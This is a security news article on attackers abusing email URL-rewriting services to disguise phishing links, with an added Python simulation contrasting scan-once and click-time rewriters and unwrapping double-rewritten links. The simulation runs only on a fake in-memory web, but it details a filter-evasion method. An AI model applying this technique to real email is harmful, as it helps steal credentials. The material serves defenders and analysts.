Attackers have found a way to turn an email security control, URL rewriting, into a tool for their own phishing campaigns.
Since mid-June 2024, threat actors have been increasingly abusing URL rewriting features, which are designed to protect users from phishing threats, to carry out sophisticated attacks.
URL rewriting is a security feature employed by various email security vendors to protect users from malicious links in emails.
The vendor replaces each original URL in an inbound message with a link on its own domain; when the recipient clicks, the request first goes to the vendor's servers, which scan the destination for threats before allowing access to the web content.
There are two main approaches to URL rewriting:-
- Legacy solutions: These rely on rules and signatures based on previously identified threats, so a destination that is clean at the time it is scanned receives a clean verdict.
- Newer solutions: These use computer vision and machine learning algorithms to scan links in real time, at the moment they are clicked.
Researchers at Perception Point also found that some organizations use a combination of both approaches, which sometimes results in a "double rewrite": one vendor's wrapper link nested inside another's.
The Exploitation Technique
Attackers have been studying the inner workings of URL rewriting and are now exploiting it in their phishing campaigns. The most common method involves:-
- Compromising legitimate email accounts protected by URL rewriting features.
- Sending an email to themselves containing a "clean" URL, one that points to a page that is harmless at that moment.
- Allowing the email security service to rewrite the URL, so the attacker now holds a link on the vendor's trusted domain.
- Weaponizing the rewritten URL by changing what its destination serves: the wrapper link itself stays the same, but the underlying URL is redirected to a phishing site after the scan has already classified it as clean.
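The four steps above amount to a time-of-check/time-of-use problem: a rewriter that scans once and caches the verdict on the wrapper link keeps trusting a destination the attacker has since changed. The following simulation is an added example, not code from Perception Point or from any of the vendors named in the article. It models two hypothetical rewriting services with an invented wrapper format (`https://<rewriter>/v1?u=<encoded destination>`), a constructed in-memory "web" that the attacker can edit after the scan, and a toy classifier; the initial account compromise is assumed rather than simulated. It also shows how to unwrap the "double rewrite" described earlier, where one vendor's wrapper encloses another's.

```python
"""Simulation of URL-rewriting abuse (added example, not vendor code).

Hypothetical rewriter hosts and wrapper format are assumptions for this
example.  WEB is a constructed stand-in for the internet: the attacker can
change what a destination serves after the rewriter has looked at it.
"""
from urllib.parse import quote, urlsplit, parse_qs

# Assumed rewriter domains; any real vendor uses its own, different format.
REWRITER_HOSTS = {"scan.example-sec.test", "click.example-gw.test"}

# Constructed "web": destination URL -> page content served right now.
WEB = {}


def fetch(url):
    """Return the page currently served at url (empty if unknown)."""
    return WEB.get(url, "")


def looks_malicious(content):
    """Toy classifier: a form that asks for a password counts as phishing."""
    return "<form" in content and "password" in content


def rewrite(url, host):
    """Wrap url in the assumed wrapper format on the given rewriter host."""
    return f"https://{host}/v1?u={quote(url, safe='')}"


def unwrap(url):
    """Return (innermost destination, chain of URLs) for a possibly
    double-rewritten link.  parse_qs already percent-decodes the value,
    so the inner URL is not decoded a second time."""
    chain = [url]
    while True:
        parts = urlsplit(url)
        if parts.hostname not in REWRITER_HOSTS:
            return url, chain
        inner = parse_qs(parts.query).get("u")
        if not inner:
            return url, chain
        url = inner[0]
        chain.append(url)


class LegacyRewriter:
    """Scans the destination once, at rewrite time, and caches the verdict."""

    def __init__(self, host):
        self.host = host
        self.verdicts = {}

    def rewrite(self, url):
        wrapped = rewrite(url, self.host)
        self.verdicts[wrapped] = looks_malicious(fetch(url))  # time of check
        return wrapped

    def click(self, wrapped):
        # Unknown wrappers are blocked; known ones reuse the cached verdict.
        return "blocked" if self.verdicts.get(wrapped, True) else "allowed"


class ClickTimeRewriter:
    """Re-fetches and re-scans the destination on every click."""

    def __init__(self, host):
        self.host = host

    def rewrite(self, url):
        return rewrite(url, self.host)

    def click(self, wrapped):
        dest, _ = unwrap(wrapped)
        return "blocked" if looks_malicious(fetch(dest)) else "allowed"


def run_attack(service):
    """Replay the article's steps against a rewriting service and return the
    (verdict before weaponization, verdict after weaponization) pair."""
    WEB.clear()
    dest = "https://attacker-controlled.test/invoice"      # assumed attacker host
    WEB[dest] = "<html>Your invoice is attached.</html>"    # clean at scan time
    wrapped = service.rewrite(dest)       # attacker mails the link to themself
    before = service.click(wrapped)       # sanity check: clean page passes
    # Attacker swaps the destination content; the wrapper link is unchanged.
    WEB[dest] = "<form action=https://attacker-controlled.test/steal>password</form>"
    after = service.click(wrapped)        # the victim clicks the same link
    return before, after


if __name__ == "__main__":
    print("legacy    :", run_attack(LegacyRewriter("scan.example-sec.test")))
    print("click-time:", run_attack(ClickTimeRewriter("click.example-gw.test")))
    double = rewrite(rewrite("https://attacker-controlled.test/invoice",
                             "scan.example-sec.test"), "click.example-gw.test")
    print("double rewrite unwraps to:", unwrap(double)[0])
```

Run stand-alone, the legacy service answers `('allowed', 'allowed')` and the click-time service `('allowed', 'blocked')`, which is the whole attack in one line each: the cached verdict never sees the changed page. The `unwrap` helper is what an analyst needs when triaging a reported message, since the visible link only tells you which vendor wrapped it, not where it leads.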
This technique is particularly dangerous because the link the victim sees carries a known security vendor's domain. It takes advantage of users' trust in that brand, making even security-aware employees more likely to click on a seemingly safe link.
Perception Point's security researchers have intercepted several attacks exploiting URL rewriting services:-
- Double Rewrite Attack: Involving Proofpoint and INKY, this attack used a doubly rewritten phishing link disguised as a SharePoint notification. The landing page included a CAPTCHA challenge to evade automated analysis.
- Multi-Target Exploitation: Attackers compromised an organization protected by INKY and Proofpoint, generated a rewritten URL there, and reused that single URL to target multiple other organizations.
- Mimecast Exploitation: A phishing attack leveraged Mimecast's URL rewriting service to disguise a malicious link leading to a credential-stealing site.
- IRS Phishing via Sophos: An attack used Sophos's URL rewriting service to mask a phishing link in an email impersonating the IRS and ID.me.
To combat these attacks, advanced security solutions like Perception Point's Dynamic URL Analysis are being employed. This approach offers:-
- Proactive detection by scanning URLs in real time before email delivery
- Advanced anti-evasion capabilities to undo tactics like CAPTCHA and geo-fencing
- Post-delivery and meta-analysis to catch evolving threats
- Browser-level security extensions for additional protection
As phishing tactics continue to evolve, it's crucial for organizations and individuals to stay informed about these new techniques and implement robust, multi-layered security solutions to protect against increasingly sophisticated cyber threats.
This article first appeared in Cyber Security News, written by Tushar Subhra Dutta on November 25, 2024.